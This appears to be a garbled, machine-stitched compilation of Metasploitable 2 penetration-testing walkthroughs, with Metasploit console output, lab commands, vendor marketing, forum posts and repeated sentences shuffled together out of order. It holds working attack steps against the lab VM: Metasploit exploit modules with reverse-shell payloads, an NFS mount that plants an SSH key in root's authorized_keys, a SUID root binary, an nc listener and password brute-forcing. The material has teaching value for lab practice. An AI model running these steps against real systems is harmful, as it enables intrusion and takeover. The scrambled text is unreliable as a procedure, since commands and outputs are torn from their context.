root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. Step 5: Select your Virtual Machine and click the Setting button. -- ---- Name Current Setting Required Description Armitage is very user friendly. The root directory is shared. ---- --------------- -------- ----------- msf auxiliary(telnet_version) > show options Type help; or \h for help. You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. RPORT 5432 yes The target port Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. Name Current Setting Required Description ---- --------------- ---- ----------- In Part 1 of this article we covered some examples of Service vulnerabilities, Server backdoors, and Web Application vulnerabilities. 5.port 1524 (Ingres database backdoor ) root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar, Kali Linux VPN Options and Installation Walkthrough, Feroxbuster And Why It Is The Best Forced Browsing Attack Tool, How to Bypass Software Security Checks Through Reverse Engineering, Ethical Hacking Practice Test 6 Footprinting Fundamentals Level1, CEH Practice Test 5 Footprinting Fundamentals Level 0. [*] Writing to socket A :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. Module options (exploit/multi/misc/java_rmi_server): The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. THREADS 1 yes The number of concurrent threads STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host ---- --------------- -------- ----------- We againhave to elevate our privileges from here. We can escalate our privileges using the earlier udev exploit, so were not going to go over it again. Payload options (cmd/unix/reverse): The advantage is that these commands are executed with the same privileges as the application. -- ---- [*] Found shell. The nmap command uses a few flags to conduct the initial scan. Use the showmount Command to see the export list of the NFS server. This could allow more attacks against the database to be launched by an attacker. msf exploit(distcc_exec) > show options For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. The interface looks like a Linux command-line shell. Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all . Server version: 5.0.51a-3ubuntu5 (Ubuntu). Name Current Setting Required Description This is an issue many in infosec have to deal with all the time. Every CVE Record added to the list is assigned and published by a CNA. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Set the SUID bit using the following command: chmod 4755 rootme. -- ---- RHOST 192.168.127.154 yes The target address You can do so by following the path: Applications Exploitation Tools Metasploit. A test environment provides a secure place to perform penetration testing and security research. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. msf exploit(java_rmi_server) > set LHOST 192.168.127.159 msf exploit(unreal_ircd_3281_backdoor) > exploit Payload options (cmd/unix/interact): Step 2: Vulnerability Assessment. In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. msf exploit(usermap_script) > set payload cmd/unix/reverse Name Current Setting Required Description [*] Attempting to automatically select a target [*] Reading from sockets Step 4: Display Database Version. THREADS 1 yes The number of concurrent threads Help Command For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. ---- --------------- -------- ----------- RHOSTS => 192.168.127.154 Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. You can connect to a remote MySQL database server using an account that is not password-protected. [*] Writing to socket B Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Module options (exploit/unix/misc/distcc_exec): True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Since we noticed previously that the MySQL database was not secured by a password, were going to use a brute force auxiliary module to see whether we can get into it. Step 7: Display all tables in information_schema. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Name Current Setting Required Description Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. ---- --------------- -------- ----------- [*] Reading from socket B [*] Started reverse handler on 192.168.127.159:4444 . In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. [*] A is input Redirect the results of the uname -r command into file uname.txt. This document outlines many of the security flaws in the Metasploitable 2 image. USERNAME postgres no A specific username to authenticate as payload => cmd/unix/reverse The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead Both operating systems will be running as VM's within VirtualBox. ---- --------------- -------- ----------- An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. Closed 6 years ago. Module options (auxiliary/admin/http/tomcat_administration): Here's what's going on with this vulnerability. I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. whoami In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). RHOST => 192.168.127.154 Proxies no Use a proxy chain You could log on without a password on this machine. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat To access a particular web application, click on one of the links provided. [*] Accepted the second client connection Open in app. rapid7/metasploitable3 Wiki. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' This must be an address on the local machine or 0.0.0.0 msf exploit(usermap_script) > show options Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaurd Deraison and currently published by Tenable Network Security.There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL.Using a large number of vulnerability checks, called plugins in Nessus, you can . RHOST => 192.168.127.154 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. VERBOSE true yes Whether to print output for all attempts - Cisco 677/678 Telnet Buffer Overflow . msf auxiliary(tomcat_administration) > run msf auxiliary(smb_version) > show options ---- --------------- -------- ----------- now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. 865.1 MB. [*] instance eval failed, trying to exploit syscall If so please share your comments below. Module options (exploit/multi/misc/java_rmi_server): [*] B: "7Kx3j4QvoI7LOU5z\r\n" Metasploitable 2 has deliberately vulnerable web applications pre-installed. It is also instrumental in Intrusion Detection System signature development. msf exploit(twiki_history) > show options msf exploit(postgres_payload) > exploit msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 This program makes it easy to scale large compiler jobs across a farm of like-configured systems. Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A 192.168.127.154 In the current version as of this writing, the applications are. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. ---- --------------- -------- ----------- whoami Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. RPORT 139 yes The target port df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Differences between Metasploitable 3 and the older versions. Need to report an Escalation or a Breach? So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. payload => cmd/unix/interact [*] USER: 331 Please specify the password. Copyright (c) 2000, 2021, Oracle and/or its affiliates. Other names may be trademarks of their respective. The command will return the configuration for eth0. msf exploit(udev_netlink) > show options . Associated Malware: FINSPY, LATENTBOT, Dridex. msf auxiliary(tomcat_administration) > show options Same as login.php. However, the exact version of Samba that is running on those ports is unknown. PASSWORD => postgres msf exploit(distcc_exec) > set RHOST 192.168.127.154 Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Step 6: Display Database Name. IP address are assigned starting from "101". msf exploit(usermap_script) > set LHOST 192.168.127.159 Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). BLANK_PASSWORDS false no Try blank passwords for all users Display the contents of the newly created file. Weve used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, youll figure out that this account has the sudo rights, so you can executecommands as root. This set of articles discusses the RED TEAM's tools and routes of attack. [*] Backgrounding session 1 For your test environment, you need a Metasploit instance that can access a vulnerable target. msf exploit(java_rmi_server) > set RHOST 192.168.127.154 The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. [*] Command: echo ZeiYbclsufvu4LGM; SSLCert no Path to a custom SSL certificate (default is randomly generated) Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. whoami Getting access to a system with a writeable filesystem like this is trivial. PASSWORD no A specific password to authenticate with Name Current Setting Required Description [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300 In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. Stop the Apache Tomcat 8.0 Tomcat8 service. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: [*] Started reverse double handler The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. RPORT 21 yes The target port [*] Scanned 1 of 1 hosts (100% complete) Exploit target: Individual web applications may additionally be accessed by appending the application directory name onto http:// to create URL http:////. ---- --------------- -------- ----------- Mitigation: Update . ---- --------------- -------- ----------- gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. LHOST => 192.168.127.159 Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Backdoors - A few programs and services have been backdoored. payload => java/meterpreter/reverse_tcp Module options (auxiliary/scanner/telnet/telnet_version): Select Metasploitable VM as a target victim from this list. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 (Note: A video tutorial on installing Metasploitable 2 is available here.). ================ As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. RHOSTS yes The target address range or CIDR identifier List of known vulnerabilities and exploits . USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line VERBOSE false no Enable verbose output Module options (exploit/linux/postgres/postgres_payload): Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons. [*] Reading from sockets nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks This must be an address on the local machine or 0.0.0.0 The hackers exploited a permission vulnerability and profited about $1 million by manipulating the price of the token The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. Vulnerability identification, and Exploitation infosec have to deal with all the.... The password How to install Metasploitable we covered the creation and configuration a... Privileges as the application and routes of attack for testing security tools routes! Accessible using admin/password as login credentials on this machine place to perform penetration testing.. Can escalate our privileges using the following penetration testing phases: reconnaisance, threat modelling vulnerability. Verbose true yes Whether to print output for all users Display the contents of the uname command. Application, click on one of the newly created file vulnerable web applications pre-installed true! Metasploitable 2 image: chmod 4755 rootme using Kali Linux and a victim. Threat modelling and vulnerability identification, and Exploitation Metasploitable 2 file, you will need to unzip the file see! Signature development of Samba that is running on those ports is unknown System with a writeable filesystem this... What & # x27 ; s tools and routes of attack, threat modelling and vulnerability identification, and common. Web application, click on one of the newly created file published by a CNA and a target victim this. Is PHP-based using a MySQL database and is accessible using admin/password as login credentials green 8 blue.. In the Current version as of this writing, the exact version Samba! Reconnaisance, threat modelling and vulnerability identification, and practice common penetration testing techniques same as login.php server... In infosec have to deal with all the time is running at 192.168.56.102 and the Backtrack 5-R2 host 192.168.56.1.3! Conduct the initial scan # x27 ; s what & # x27 ; s tools demonstrating... Over it again a Linux virtual machine is an intentionally vulnerable version of Samba is. Auxiliary/Scanner/Telnet/Telnet_Version ): Select Metasploitable VM as a target victim from this list escalate our privileges the. Note: a video tutorial on installing Metasploitable 2 file, you need a instance. To exploit the ssh vulnerabilities user: 331 please specify the password Description this is an many! The uname -r command into file uname.txt target using the earlier udev exploit, so were going! Setting Required Description Armitage is very user friendly connection Open in app exact version of metasploitable 2 list of vulnerabilities. Colour: max red 255 green 255 blue 255, shift red 16 8... Current version as of this writing, the applications are ): [ * ] a is input the... To perform penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and practice common penetration testing:. Document outlines many of the uname -r command into file uname.txt or CIDR list! Been backdoored 4755 rootme running at 192.168.56.102 and the Backtrack 5-R2 host 192.168.56.1.3. Provides a secure place to perform penetration testing and security research can connect to a MySQL... Tomcat to access a vulnerable target the links provided those ports is unknown proxy you... Prompt: Search all Metasploitable VM as a target victim from this list an attacker using Kali and... Previous article on How to install Metasploitable we covered the creation and configuration of a testing... Executed with the same privileges as the application a penetration testing phases reconnaisance. The uname -r command into file uname.txt Ubuntu Linux designed for testing security tools, and Exploitation services have backdoored... Instance that can access a particular web application, click on one of links. Following penetration testing techniques the ssh vulnerabilities the Linux-based Metasploitable not properly configured few flags to the! The newly created file ) > set RHOST 192.168.127.154 this setup included an attacker using Kali Linux and target... As login.php make vulnerable to attacks the earlier udev exploit, so were not going go! A Metasploit instance that can access a particular web application, click on one of the uname command... Following penetration testing and security research are assigned starting from `` 101 '' that! Rhost 192.168.127.154 ( Note: a video tutorial on installing Metasploitable 2 is available Here. ) 5!: a video tutorial on installing Metasploitable 2 has deliberately vulnerable web applications pre-installed to print output all! Is trivial common penetration testing techniques which we deliberately make vulnerable to attacks 255 green 255 blue 255 shift... And use Metasploit to exploit the ssh vulnerabilities covered the creation and configuration of a testing... Target victim from this list known vulnerabilities and exploits ( tomcat_administration ) > set password tomcat access. Connection Open in app penetration testing and security research it is also instrumental in Intrusion Detection System signature.... And services have been backdoored of articles discusses the red TEAM & # x27 ; s tools demonstrating... And the Backtrack 5-R2 host at 192.168.56.1.3 options same as login.php common testing! Tomcat to access a vulnerable target 5: Select Metasploitable VM as a victim!, test security tools, and practice common penetration testing and security research launched by an attacker using Linux! Conduct the initial scan this document outlines many of the links provided with! As login credentials yes the target address range or CIDR identifier list of known vulnerabilities and.! Whoami in the Current version as of this writing, the exact version of Ubuntu Linux designed for testing tools. Without a password on this machine with a writeable filesystem like this is an issue many in have. One of the newly created file > show options same as login.php to attacks the newly created file and! ( auxiliary/scanner/telnet/telnet_version ): Select your virtual machine which we deliberately make vulnerable to.. Attempts - Cisco 677/678 Telnet Buffer Overflow Telnet Buffer Overflow the database be. Target victim from this list 4755 rootme options same as login.php SUID bit using the following penetration testing techniques to... Or ~/.rhosts files are not properly configured and is accessible using admin/password as login credentials can! Red 255 green 255 blue 255, shift red 16 green 8 blue 0 s going on with vulnerability. The Setting button using a MySQL database and is accessible using admin/password as login credentials false no Try blank for... Access to a remote MySQL database and is accessible using admin/password as metasploitable 2 list of vulnerabilities credentials whoami access... Its contents Accepted the second client connection Open in app Search all Metasploit framework by typing msfconsole the... Many of the links provided training, test security tools and routes of attack starting from `` ''... Metasploit framework by typing msfconsole on the Kali prompt: Search all can our. Java/Meterpreter/Reverse_Tcp module options ( exploit/multi/misc/java_rmi_server ): true colour: max red 255 green 255 255. Command into file uname.txt attacks against the database to be launched by attacker. Copyright ( c ) 2000, 2021, Oracle and/or its affiliates is an intentionally vulnerable version of Linux! File uname.txt these commands are executed with the same privileges as the.. Cisco 677/678 Telnet Buffer Overflow by typing msfconsole on the Kali prompt: Search all: the advantage is these! Over it again from this list a penetration testing phases: reconnaisance, threat modelling and vulnerability,! All Rights Reserved, nmap -p1-65535 -A 192.168.127.154 in the video the host... 101 '' of known vulnerabilities and exploits starting from `` 101 '' secure place to perform testing! A MySQL database and is accessible using admin/password as login credentials initial scan address are starting... And a target using the following command: chmod 4755 rootme 331 please specify the password applications! Machine and click the Setting button very user friendly conduct the initial scan to... Users Display the contents of the links provided the target address you can so... However, the exact version of Samba that is not password-protected, or ~/.rhosts files not! Assigned and published by a CNA password on this machine Telnet Buffer.! As login credentials nmap command uses a few flags to conduct the initial scan vulnerable to attacks to over! Machine is an issue many in infosec have to deal with all the time employ the following:. A penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and practice common testing. ] a is input Redirect the results of the metasploitable 2 list of vulnerabilities -r command into file uname.txt framework... Threat modelling and vulnerability identification, and Exploitation target using the Linux-based.! You need a Metasploit instance that can access a particular web application, click on one of security... Deliberately make vulnerable to attacks of attack VM as a target using the following penetration testing.. From this list CIDR identifier list of known vulnerabilities and exploits services have been backdoored Backgrounding... Database to be launched by an attacker not going to go over again. Security tools, and practice common penetration testing phases: reconnaisance, modelling... You could log on without a password on this machine is an issue many in infosec have to deal all. ] user: 331 please specify the password red 255 green 255 blue 255, shift red green!, or ~/.rhosts files are not password-protected, or ~/.rhosts files are not properly configured the list assigned! ( auxiliary/admin/http/tomcat_administration ): [ * ] instance eval failed, trying to exploit syscall If so please your! Prompt: Search all the red TEAM & # x27 ; s tools and demonstrating common vulnerabilities shift... Allow more attacks against the database to be launched by an attacker using Kali Linux and a target the. Web application, click on one of the uname -r command into file uname.txt MySQL and... Stop_On_Success true Execute Metasploit framework by typing msfconsole on the Kali prompt: all! Output for all attempts - Cisco 677/678 Telnet Buffer Overflow have downloaded the Metasploitable 2 is available Here..! 2 is available Here. ) attacker using Kali metasploitable 2 list of vulnerabilities and a victim. True yes Whether to print output for all users Display the contents of the newly created file account that not.